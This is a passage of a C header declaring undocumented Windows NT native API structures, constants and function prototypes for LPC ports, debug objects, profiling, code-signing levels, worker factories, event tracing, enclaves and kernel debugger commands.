   union {\n        CLIENT_ID ClientId;\n        double DoNotUseThisField;       // Force quadword alignment\n    } u3;\n    ULONG MessageId;\n    union {\n        SIZE_T ClientViewSize;               // Only valid on LPC_CONNECTION_REQUEST message\n        ULONG CallbackId;                   // Only valid on LPC_REQUEST message\n    } u4;\n} PORT_MESSAGE, *PPORT_MESSAGE;\n\ntypedef struct _PORT_MESSAGE32 {\n    union {\n        struct {\n            CSHORT DataLength;\n            CSHORT TotalLength;\n        } s1;\n        ULONG Length;\n    } u1;\n    union {\n        struct {\n            CSHORT Type;\n            CSHORT DataInfoOffset;\n        } s2;\n        ULONG ZeroInit;\n    } u2;\n    union {\n        CLIENT_ID32 ClientId;\n        double DoNotUseThisField;       // Force quadword alignment\n    } u3;\n    ULONG MessageId;\n    union {\n        ULONG ClientViewSize;               // Only valid on LPC_CONNECTION_REQUEST message\n        ULONG CallbackId;                   // Only valid on LPC_REQUEST message\n    } u4;\n} PORT_MESSAGE32, * PPORT_MESSAGE32;\n\ntypedef struct _PORT_MESSAGE64\n{\n    union\n    {\n        struct\n        {\n            CSHORT DataLength;\n            CSHORT TotalLength;\n        } s1;\n        ULONG Length;\n    } u1;\n    union\n    {\n        struct\n        {\n            CSHORT Type;\n            CSHORT DataInfoOffset;\n        } s2;\n        ULONG ZeroInit;\n    } u2;\n    union\n    {\n        CLIENT_ID64 ClientId;\n        double DoNotUseThisField;\n    };\n    ULONG MessageId;\n    union\n    {\n        ULONGLONG ClientViewSize; // only valid for LPC_CONNECTION_REQUEST messages\n        ULONG CallbackId; // only valid for LPC_REQUEST messages\n    };\n} PORT_MESSAGE64, * PPORT_MESSAGE64;\n\ntypedef struct _PORT_DATA_ENTRY {\n    PVOID Base;\n    ULONG Size;\n} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;\n\ntypedef struct _PORT_DATA_INFORMATION {\n    ULONG CountDataEntries;\n    PORT_DATA_ENTRY DataEntries[1];\n} 
PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;\n\n#ifndef InitializeMessageHeader\n#define InitializeMessageHeader(ph, l, t)                                   \\\n{                                                                           \\\n    (ph)->u1.s1.TotalLength         = (USHORT)(l);                          \\\n    (ph)->u1.s1.DataLength          = (USHORT)((l) - sizeof(PORT_MESSAGE)); \\\n    (ph)->u2.s2.Type                = (USHORT)(t);                          \\\n    (ph)->u2.s2.DataInfoOffset      = 0;                                    \\\n    (ph)->u3.ClientId.UniqueProcess = NULL;                                 \\\n    (ph)->u3.ClientId.UniqueThread  = NULL;                                 \\\n    (ph)->MessageId                 = 0;                                    \\\n    (ph)->u4.ClientViewSize         = 0;                                    \\\n}\n#endif\n\n#define LPC_REQUEST                 1\n#define LPC_REPLY                   2\n#define LPC_DATAGRAM                3\n#define LPC_LOST_REPLY              4\n#define LPC_PORT_CLOSED             5\n#define LPC_CLIENT_DIED             6\n#define LPC_EXCEPTION               7\n#define LPC_DEBUG_EVENT             8\n#define LPC_ERROR_EVENT             9\n#define LPC_CONNECTION_REQUEST      10\n#define LPC_CONTINUATION_REQUIRED   0x2000\n\n\n#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)\n#define PORT_MAXIMUM_MESSAGE_LENGTH 256\n\ntypedef struct _LPC_CLIENT_DIED_MSG {\n    PORT_MESSAGE PortMsg;\n    LARGE_INTEGER CreateTime;\n} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePort(\n    _Out_ PHANDLE PortHandle,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG MaxConnectionInfoLength,\n    _In_ ULONG MaxMessageLength,\n    _In_ ULONG MaxPoolUsage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompleteConnectPort(\n    _In_ HANDLE PortHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtListenPort(\n    _In_ HANDLE PortHandle,\n    _Out_ PPORT_MESSAGE 
ConnectionRequest);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReplyPort(\n    _In_ HANDLE PortHandle,\n    _In_ PPORT_MESSAGE ReplyMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReplyWaitReplyPort(\n    _In_ HANDLE PortHandle,\n    _Inout_ PPORT_MESSAGE ReplyMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRequestPort(\n    _In_ HANDLE PortHandle,\n    _In_ PPORT_MESSAGE RequestMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRequestWaitReplyPort(\n    _In_ HANDLE PortHandle,\n    _In_ PPORT_MESSAGE RequestMessage,\n    _Out_ PPORT_MESSAGE ReplyMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtClosePort(\n    _In_ HANDLE PortHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReplyWaitReceivePort(\n    _In_ HANDLE PortHandle,\n    _Out_opt_ PVOID *PortContext,\n    _In_opt_ PPORT_MESSAGE ReplyMessage,\n    _Out_ PPORT_MESSAGE ReceiveMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteRequestData(\n    _In_ HANDLE PortHandle,\n    _In_ PPORT_MESSAGE Message,\n    _In_ ULONG DataEntryIndex,\n    _In_ PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _Out_opt_ PULONG NumberOfBytesWritten);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadRequestData(\n    _In_ HANDLE PortHandle,\n    _In_ PPORT_MESSAGE Message,\n    _In_ ULONG DataEntryIndex,\n    _Out_ PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _Out_opt_ PULONG NumberOfBytesRead);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtConnectPort(\n    _Out_ PHANDLE PortHandle,\n    _In_ PUNICODE_STRING PortName,\n    _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,\n    _Inout_opt_ PPORT_VIEW ClientView,\n    _Out_opt_ PREMOTE_PORT_VIEW ServerView,\n    _Out_opt_ PULONG MaxMessageLength,\n    _Inout_opt_ PVOID ConnectionInformation,\n    _Inout_opt_ PULONG ConnectionInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAcceptConnectPort(\n    _Out_ PHANDLE PortHandle,\n    _In_opt_ PVOID PortContext,\n    _In_ PPORT_MESSAGE ConnectionRequest,\n    _In_ BOOLEAN AcceptConnection,\n    _Inout_opt_ PPORT_VIEW ServerView,\n    _Out_opt_ PREMOTE_PORT_VIEW 
ClientView);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSecureConnectPort(\n    _Out_ PHANDLE PortHandle,\n    _In_ PUNICODE_STRING PortName,\n    _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,\n    _Inout_opt_ PPORT_VIEW ClientView,\n    _In_opt_ PSID RequiredServerSid,\n    _Inout_opt_ PREMOTE_PORT_VIEW ServerView,\n    _Out_opt_ PULONG MaxMessageLength,\n    _Inout_opt_ PVOID ConnectionInformation,\n    _Inout_opt_ PULONG ConnectionInformationLength);\n\n/************************************************************************************\n*\n* Boot Management API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtEnumerateBootEntries(\n    _Out_writes_bytes_opt_(*BufferLength) PVOID Buffer,\n    _Inout_ PULONG BufferLength);\n\n/************************************************************************************\n*\n* Reserve Objects API.\n*\n************************************************************************************/\n\ntypedef enum _MEMORY_RESERVE_TYPE {\n    MemoryReserveUserApc,\n    MemoryReserveIoCompletion,\n    MemoryReserveTypeMax\n} MEMORY_RESERVE_TYPE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateReserveObject(\n    _Out_ PHANDLE MemoryReserveHandle,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ MEMORY_RESERVE_TYPE Type);\n\n/************************************************************************************\n*\n* Debug API.\n*\n************************************************************************************/\n\n//\n// Define the debug object that's used to attach to processes that are being debugged.\n//\n#define DEBUG_OBJECT_DELETE_PENDING (0x1) // Debug object is delete pending.\n#define DEBUG_OBJECT_KILL_ON_CLOSE  (0x2) // Kill all debugged processes on close\n\ntypedef struct _DEBUG_OBJECT {\n    //\n    // Event that's set when the EventList is populated.\n    //\n    KEVENT EventsPresent;\n    //\n    // Mutex to protect the structure\n    //\n    FAST_MUTEX 
Mutex;\n    //\n    // Queue of events waiting for debugger intervention\n    //\n    LIST_ENTRY EventList;\n    //\n    // Flags for the object\n    //\n    ULONG Flags;\n} DEBUG_OBJECT, *PDEBUG_OBJECT;\n\ntypedef enum _DEBUGOBJECTINFOCLASS {\n    DebugObjectUnusedInformation,\n    DebugObjectKillProcessOnExitInformation,\n    MaxDebugObjectInfoClass\n} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;\n\ntypedef struct _DBGKM_EXCEPTION {\n    EXCEPTION_RECORD ExceptionRecord;\n    ULONG FirstChance;\n} DBGKM_EXCEPTION, * PDBGKM_EXCEPTION;\n\ntypedef struct _DBGKM_CREATE_THREAD {\n    ULONG SubSystemKey;\n    PVOID StartAddress;\n} DBGKM_CREATE_THREAD, * PDBGKM_CREATE_THREAD;\n\ntypedef struct _DBGKM_CREATE_PROCESS {\n    ULONG SubSystemKey;\n    HANDLE FileHandle;\n    PVOID BaseOfImage;\n    ULONG DebugInfoFileOffset;\n    ULONG DebugInfoSize;\n    DBGKM_CREATE_THREAD InitialThread;\n} DBGKM_CREATE_PROCESS, * PDBGKM_CREATE_PROCESS;\n\ntypedef struct _DBGKM_EXIT_THREAD {\n    NTSTATUS ExitStatus;\n} DBGKM_EXIT_THREAD, * PDBGKM_EXIT_THREAD;\n\ntypedef struct _DBGKM_EXIT_PROCESS {\n    NTSTATUS ExitStatus;\n} DBGKM_EXIT_PROCESS, * PDBGKM_EXIT_PROCESS;\n\ntypedef struct _DBGKM_LOAD_DLL {\n    HANDLE FileHandle;\n    PVOID BaseOfDll;\n    ULONG DebugInfoFileOffset;\n    ULONG DebugInfoSize;\n    PVOID NamePointer;\n} DBGKM_LOAD_DLL, * PDBGKM_LOAD_DLL;\n\ntypedef struct _DBGKM_UNLOAD_DLL {\n    PVOID BaseAddress;\n} DBGKM_UNLOAD_DLL, * PDBGKM_UNLOAD_DLL;\n\ntypedef enum _DBG_STATE {\n    DbgIdle,\n    DbgReplyPending,\n    DbgCreateThreadStateChange,\n    DbgCreateProcessStateChange,\n    DbgExitThreadStateChange,\n    DbgExitProcessStateChange,\n    DbgExceptionStateChange,\n    DbgBreakpointStateChange,\n    DbgSingleStepStateChange,\n    DbgLoadDllStateChange,\n    DbgUnloadDllStateChange\n} DBG_STATE, * PDBG_STATE;\n\ntypedef struct _DBGUI_CREATE_THREAD {\n    HANDLE HandleToThread;\n    DBGKM_CREATE_THREAD NewThread;\n} DBGUI_CREATE_THREAD, * 
PDBGUI_CREATE_THREAD;\n\ntypedef struct _DBGUI_CREATE_PROCESS {\n    HANDLE HandleToProcess;\n    HANDLE HandleToThread;\n    DBGKM_CREATE_PROCESS NewProcess;\n} DBGUI_CREATE_PROCESS, * PDBGUI_CREATE_PROCESS;\n\ntypedef struct _DBGUI_WAIT_STATE_CHANGE {\n    DBG_STATE NewState;\n    CLIENT_ID AppClientId;\n    union\n    {\n        DBGKM_EXCEPTION Exception;\n        DBGUI_CREATE_THREAD CreateThread;\n        DBGUI_CREATE_PROCESS CreateProcessInfo;\n        DBGKM_EXIT_THREAD ExitThread;\n        DBGKM_EXIT_PROCESS ExitProcess;\n        DBGKM_LOAD_DLL LoadDll;\n        DBGKM_UNLOAD_DLL UnloadDll;\n    } StateInfo;\n} DBGUI_WAIT_STATE_CHANGE, * PDBGUI_WAIT_STATE_CHANGE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateDebugObject(\n    _Out_ PHANDLE DebugObjectHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationDebugObject(\n    _In_ HANDLE DebugObjectHandle,\n    _In_ DEBUGOBJECTINFOCLASS DebugObjectInformationClass,\n    _In_reads_bytes_(DebugInformationLength) PVOID DebugInformation,\n    _In_ ULONG DebugInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDebugActiveProcess(\n    _In_ HANDLE ProcessHandle,\n    _In_ HANDLE DebugObjectHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDebugContinue(\n    _In_ HANDLE DebugObjectHandle,\n    _In_ PCLIENT_ID ClientId,\n    _In_ NTSTATUS ContinueStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForDebugEvent(\n    _In_ HANDLE DebugObjectHandle,\n    _In_ BOOLEAN Alertable,\n    _In_opt_ PLARGE_INTEGER Timeout,\n    _Out_ PDBGUI_WAIT_STATE_CHANGE WaitStateChange\n);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRemoveProcessDebug(\n    _In_ HANDLE ProcessHandle,\n    _In_ HANDLE DebugObjectHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDebugFilterState(\n    _In_ ULONG ComponentId,\n    _In_ ULONG Level);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetDebugFilterState(\n    _In_ ULONG ComponentId,\n    _In_ ULONG Level,\n    
_In_ BOOLEAN State);\n\n\n/************************************************************************************\n*\n* Profile API.\n*\n************************************************************************************/\n\ntypedef enum _KPROFILE_SOURCE {\n    ProfileTime,\n    ProfileAlignmentFixup,\n    ProfileTotalIssues,\n    ProfilePipelineDry,\n    ProfileLoadInstructions,\n    ProfilePipelineFrozen,\n    ProfileBranchInstructions,\n    ProfileTotalNonissues,\n    ProfileDcacheMisses,\n    ProfileIcacheMisses,\n    ProfileCacheMisses,\n    ProfileBranchMispredictions,\n    ProfileStoreInstructions,\n    ProfileFpInstructions,\n    ProfileIntegerInstructions,\n    Profile2Issue,\n    Profile3Issue,\n    Profile4Issue,\n    ProfileSpecialInstructions,\n    ProfileTotalCycles,\n    ProfileIcacheIssues,\n    ProfileDcacheAccesses,\n    ProfileMemoryBarrierCycles,\n    ProfileLoadLinkedIssues,\n    ProfileMaximum\n} KPROFILE_SOURCE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProfile(\n    _Out_ PHANDLE ProfileHandle,\n    _In_opt_ HANDLE Process,\n    _In_ PVOID ProfileBase,\n    _In_ SIZE_T ProfileSize,\n    _In_ ULONG BucketSize,\n    _In_reads_bytes_(BufferSize) PULONG Buffer,\n    _In_ ULONG BufferSize,\n    _In_ KPROFILE_SOURCE ProfileSource,\n    _In_ KAFFINITY Affinity);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtStartProfile(\n    _In_ HANDLE ProfileHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtStopProfile(\n    _In_ HANDLE ProfileHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryIntervalProfile(\n    _In_ KPROFILE_SOURCE ProfileSource,\n    _Out_ PULONG Interval);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIntervalProfile(\n    _In_ ULONG Interval,\n    _In_ KPROFILE_SOURCE Source);\n\n/************************************************************************************\n*\n* Signing Levels API.\n*\n************************************************************************************/\ntypedef UCHAR SE_SIGNING_LEVEL, *PSE_SIGNING_LEVEL;\n\ntypedef struct _SE_FILE_CACHE_CLAIM_INFORMATION 
{\n    ULONG Size;\n    PVOID Claim;\n} SE_FILE_CACHE_CLAIM_INFORMATION, *PSE_FILE_CACHE_CLAIM_INFORMATION;\n\ntypedef struct _SE_SET_FILE_CACHE_INFORMATION {\n    ULONG Size;\n    UNICODE_STRING CatalogDirectoryPath;\n    SE_FILE_CACHE_CLAIM_INFORMATION OriginClaimInfo;\n} SE_SET_FILE_CACHE_INFORMATION, *PSE_SET_FILE_CACHE_INFORMATION;\n\n#ifndef SE_SIGNING_LEVEL_UNCHECKED\n#define SE_SIGNING_LEVEL_UNCHECKED         0x00000000\n#endif\n\n#ifndef SE_SIGNING_LEVEL_UNSIGNED\n#define SE_SIGNING_LEVEL_UNSIGNED          0x00000001\n#endif\n\n#ifndef SE_SIGNING_LEVEL_ENTERPRISE\n#define SE_SIGNING_LEVEL_ENTERPRISE        0x00000002\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_1\n#define SE_SIGNING_LEVEL_CUSTOM_1          0x00000003\n#endif\n\n#ifndef SE_SIGNING_LEVEL_DEVELOPER\n#define SE_SIGNING_LEVEL_DEVELOPER         SE_SIGNING_LEVEL_CUSTOM_1\n#endif\n\n#ifndef SE_SIGNING_LEVEL_AUTHENTICODE\n#define SE_SIGNING_LEVEL_AUTHENTICODE      0x00000004\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_2\n#define SE_SIGNING_LEVEL_CUSTOM_2          0x00000005\n#endif\n\n#ifndef SE_SIGNING_LEVEL_STORE\n#define SE_SIGNING_LEVEL_STORE             0x00000006\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_3\n#define SE_SIGNING_LEVEL_CUSTOM_3          0x00000007\n#endif\n\n#ifndef SE_SIGNING_LEVEL_ANTIMALWARE\n#define SE_SIGNING_LEVEL_ANTIMALWARE       SE_SIGNING_LEVEL_CUSTOM_3\n#endif\n\n#ifndef SE_SIGNING_LEVEL_MICROSOFT\n#define SE_SIGNING_LEVEL_MICROSOFT         0x00000008\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_4\n#define SE_SIGNING_LEVEL_CUSTOM_4          0x00000009\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_5\n#define SE_SIGNING_LEVEL_CUSTOM_5          0x0000000A\n#endif\n\n#ifndef SE_SIGNING_LEVEL_DYNAMIC_CODEGEN\n#define SE_SIGNING_LEVEL_DYNAMIC_CODEGEN   0x0000000B\n#endif\n\n#ifndef SE_SIGNING_LEVEL_WINDOWS\n#define SE_SIGNING_LEVEL_WINDOWS           0x0000000C\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_7\n#define SE_SIGNING_LEVEL_CUSTOM_7          0x0000000D\n#endif\n\n#ifndef 
SE_SIGNING_LEVEL_WINDOWS_TCB\n#define SE_SIGNING_LEVEL_WINDOWS_TCB       0x0000000E\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_6\n#define SE_SIGNING_LEVEL_CUSTOM_6          0x0000000F\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetCachedSigningLevel(\n    _In_ ULONG Flags,\n    _In_ SE_SIGNING_LEVEL InputSigningLevel,\n    _In_reads_(SourceFileCount) PHANDLE SourceFiles,\n    _In_ ULONG SourceFileCount,\n    _In_opt_ HANDLE TargetFile);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetCachedSigningLevel2(\n    _In_ ULONG Flags,\n    _In_ SE_SIGNING_LEVEL InputSigningLevel,\n    _In_reads_(SourceFileCount) PHANDLE SourceFiles,\n    _In_ ULONG SourceFileCount,\n    _In_opt_ HANDLE TargetFile,\n    _In_opt_ SE_SET_FILE_CACHE_INFORMATION* CacheInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetCachedSigningLevel(\n    _In_ HANDLE File,\n    _Out_ PULONG Flags,\n    _Out_ PSE_SIGNING_LEVEL SigningLevel,\n    _Out_writes_bytes_to_opt_(*ThumbprintSize, *ThumbprintSize) PUCHAR Thumbprint,\n    _Inout_opt_ PULONG ThumbprintSize,\n    _Out_opt_ PULONG ThumbprintAlgorithm);\n\n//REDSTONE 2 and above\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompareSigningLevels(\n    _In_ SE_SIGNING_LEVEL FirstSigningLevel,\n    _In_ SE_SIGNING_LEVEL SecondSigningLevel);\n\n/************************************************************************************\n*\n* Worker Factory API.\n*\n************************************************************************************/\n\ntypedef enum _WORKERFACTORYINFOCLASS {\n    WorkerFactoryTimeout,\n    WorkerFactoryRetryTimeout,\n    WorkerFactoryIdleTimeout,\n    WorkerFactoryBindingCount,\n    WorkerFactoryThreadMinimum,\n    WorkerFactoryThreadMaximum,\n    WorkerFactoryPaused,\n    WorkerFactoryBasicInformation,\n    WorkerFactoryAdjustThreadGoal,\n    WorkerFactoryCallbackType,\n    WorkerFactoryStackInformation,\n    WorkerFactoryThreadBasePriority,\n    WorkerFactoryTimeoutWaiters,\n    WorkerFactoryFlags,\n    WorkerFactoryThreadSoftMaximum,\n    
MaxWorkerFactoryInfoClass\n} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;\n\ntypedef struct _WORKER_FACTORY_BASIC_INFORMATION {\n    LARGE_INTEGER Timeout;\n    LARGE_INTEGER RetryTimeout;\n    LARGE_INTEGER IdleTimeout;\n    BOOLEAN Paused;\n    BOOLEAN TimerSet;\n    BOOLEAN QueuedToExWorker;\n    BOOLEAN MayCreate;\n    BOOLEAN CreateInProgress;\n    BOOLEAN InsertedIntoQueue;\n    BOOLEAN Shutdown;\n    ULONG BindingCount;\n    ULONG ThreadMinimum;\n    ULONG ThreadMaximum;\n    ULONG PendingWorkerCount;\n    ULONG WaitingWorkerCount;\n    ULONG TotalWorkerCount;\n    ULONG ReleaseCount;\n    LONGLONG InfiniteWaitGoal;\n    PVOID StartRoutine;\n    PVOID StartParameter;\n    HANDLE ProcessId;\n    SIZE_T StackReserve;\n    SIZE_T StackCommit;\n    NTSTATUS LastThreadCreationStatus;\n} WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateWorkerFactory(\n    _Out_ PHANDLE WorkerFactoryHandleReturn,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE CompletionPortHandle,\n    _In_ HANDLE WorkerProcessHandle,\n    _In_ PVOID StartRoutine,\n    _In_opt_ PVOID StartParameter,\n    _In_opt_ ULONG MaxThreadCount,\n    _In_opt_ SIZE_T StackReserve,\n    _In_opt_ SIZE_T StackCommit);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationWorkerFactory(\n    _In_ HANDLE WorkerFactoryHandle,\n    _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,\n    _Out_writes_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation,\n    _In_ ULONG WorkerFactoryInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtShutdownWorkerFactory(\n    _In_ HANDLE WorkerFactoryHandle,\n    _Inout_ volatile LONG *PendingWorkerCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReleaseWorkerFactoryWorker(\n    _In_ HANDLE WorkerFactoryHandle);\n\n/************************************************************************************\n*\n* Event Tracing 
API.\n*\n************************************************************************************/\n\ntypedef enum _TRACE_CONTROL_INFORMATION_CLASS {\n    TraceControlStartLogger = 1,\n    TraceControlStopLogger = 2,\n    TraceControlQueryLogger = 3,\n    TraceControlUpdateLogger = 4,\n    TraceControlFlushLogger = 5,\n    TraceControlIncrementLoggerFile = 6,\n    TraceControlInvalidClass1 = 7,\n    TraceControlInvalidCalss2 = 8,\n    TraceControlInvalidClass3 = 9,\n    TraceControlInvalidClass4 = 10,\n    TraceControlRealtimeConnect = 11,\n    TraceControlWdiDispatchControl = 13,\n    TraceControlRealtimeDisconnectConsumerByHandle = 14,\n    TraceControlReceiveNotification = 16,\n    TraceControlEnableGuid = 17,\n    TraceControlSendReplyDataBlock = 18,\n    TraceControlReceiveReplyDataBlock = 19,\n    TraceControlWdiUpdateSem = 20,\n    TraceControlGetTraceGuidList = 21,\n    TraceControlGetTraceGuidInfo = 22,\n    TraceControlEnumerateTraceGuids = 23,\n    TraceControlInvalidClass5 = 24,\n    TraceControlQueryReferenceTime = 25,\n    TraceControlTrackProviderBinary = 26,\n    TraceControlAddNotificationEvent = 27,\n    TraceControlUpdateDisallowList = 28,\n    TraceControlInvalidClass6 = 29,\n    TraceControlInvalidClass7 = 30,\n    TraceControlUseDescriptorTypeUm = 31,\n    TraceControlGetTraceGroupList = 32,\n    TraceControlGetTraceGroupInfo = 33,\n    TraceControlTraceSetDisallowList = 34,\n    TraceControlSetCompressionSettings = 35,\n    TraceControlGetCompressionSettings = 36,\n    TraceControlUpdatePeriodicCaptureState = 37,\n    TraceControlGetPrivateSessionTraceHandle = 38,\n    TraceControlRegisterPrivateSession = 39,\n    TraceControlQuerySessionDemuxObject = 40,\n    TraceControlSetProviderBinaryTracking = 41,\n    TraceControlMaxLoggers = 42,\n    TraceControlMaxPmcCounter = 43\n} TRACE_CONTROL_INFORMATION_CLASS;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTraceEvent(\n    _In_ HANDLE TraceHandle,\n    _In_ ULONG Flags,\n    _In_ ULONG FieldSize,\n    _In_ PVOID 
Fields);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTraceControl(\n    _In_ TRACE_CONTROL_INFORMATION_CLASS TraceInformationClass,\n    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n    _In_ ULONG InputBufferLength,\n    _Out_writes_bytes_opt_(TraceInformationLength) PVOID TraceInformation,\n    _In_ ULONG TraceInformationLength,\n    _Out_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* Enclave API.\n*\n************************************************************************************/\n\n#ifndef _WIN32_WINNT_WIN10\n#define _WIN32_WINNT_WIN10 0x0A00\n#endif\n#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)\ntypedef LPVOID(WINAPI* PENCLAVE_ROUTINE) (LPVOID lpThreadParameter);\ntypedef PENCLAVE_ROUTINE LPENCLAVE_ROUTINE;\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEnclave(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PVOID* BaseAddress,\n    _In_ ULONG_PTR ZeroBits,\n    _In_ SIZE_T Size,\n    _In_ SIZE_T InitialCommitment,\n    _In_ ULONG EnclaveType,\n    _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,\n    _In_ ULONG EnclaveInformationLength,\n    _Out_opt_ PULONG EnclaveError);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadEnclaveData(\n    _In_ HANDLE ProcessHandle,\n    _In_ PVOID BaseAddress,\n    _In_reads_bytes_(BufferSize) PVOID Buffer,\n    _In_ SIZE_T BufferSize,\n    _In_ ULONG Protect,\n    _In_reads_bytes_(PageInformationLength) PVOID PageInformation,\n    _In_ ULONG PageInformationLength,\n    _Out_opt_ PSIZE_T NumberOfBytesWritten,\n    _Out_opt_ PULONG EnclaveError);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtInitializeEnclave(\n    _In_ HANDLE ProcessHandle,\n    _In_ PVOID BaseAddress,\n    _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,\n    _In_ ULONG EnclaveInformationLength,\n    _Out_opt_ PULONG EnclaveError);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateEnclave(\n    _In_ PVOID BaseAddress,\n    _In_ BOOLEAN 
WaitForThread);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCallEnclave(\n    _In_ PENCLAVE_ROUTINE Routine,\n    _In_ PVOID Parameter,\n    _In_ BOOLEAN WaitForThread,\n    _Out_opt_ PVOID* ReturnValue);\n\n\n/************************************************************************************\n*\n* LUID/UUID API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetUuidSeed(\n    _In_ PCHAR Seed);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateUuids(\n    _Out_ PULARGE_INTEGER Time,\n    _Out_ PULONG Range,\n    _Out_ PULONG Sequence,\n    _Out_ PCHAR Seed);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateLocallyUniqueId(\n    _Out_ PLUID Luid);\n\n\n/************************************************************************************\n*\n* Kernel Debugger API.\n*\n************************************************************************************/\n\ntypedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {\n    BOOLEAN KernelDebuggerEnabled;\n    BOOLEAN KernelDebuggerNotPresent;\n} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;\n\ntypedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX {\n    BOOLEAN DebuggerAllowed;\n    BOOLEAN DebuggerEnabled;\n    BOOLEAN DebuggerPresent;\n} SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION_EX;\n\ntypedef enum _SYSDBG_COMMAND {\n    SysDbgQueryModuleInformation,\n    SysDbgQueryTraceInformation,\n    SysDbgSetTracepoint,\n    SysDbgSetSpecialCall,\n    SysDbgClearSpecialCalls,\n    SysDbgQuerySpecialCalls,\n    SysDbgBreakPoint,\n    SysDbgQueryVersion,\n    SysDbgReadVirtual,\n    SysDbgWriteVirtual,\n    SysDbgReadPhysical,\n    SysDbgWritePhysical,\n    SysDbgReadControlSpace,\n    SysDbgWriteControlSpace,\n    SysDbgReadIoSpace,\n    SysDbgWriteIoSpace,\n    SysDbgReadMsr,\n    